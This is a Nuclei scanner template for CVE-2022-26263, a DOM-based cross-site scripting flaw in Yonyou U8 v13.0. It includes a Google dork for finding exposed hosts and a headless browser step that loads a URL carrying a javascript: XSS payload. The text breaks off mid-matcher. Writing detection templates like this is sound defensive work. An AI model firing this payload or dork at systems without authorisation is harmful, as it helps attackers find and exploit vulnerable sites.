id: CVE-2022-26263 info: name: Yonyou u8 v13.0 - Cross Site Scripting author: edoardottt,theamanrawat severity: medium description: | Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp. reference: - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 classification: cve-id: CVE-2022-26263 metadata: verified: true google-dork: inurl:/u8sl/WebHelp tags: cve,cve2022,yonyou,xss headless: - steps: - args: url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27">()locxss")#javascript:console.log(document.domain)' action: navigate - action: waitload matchers: - type: word words: - '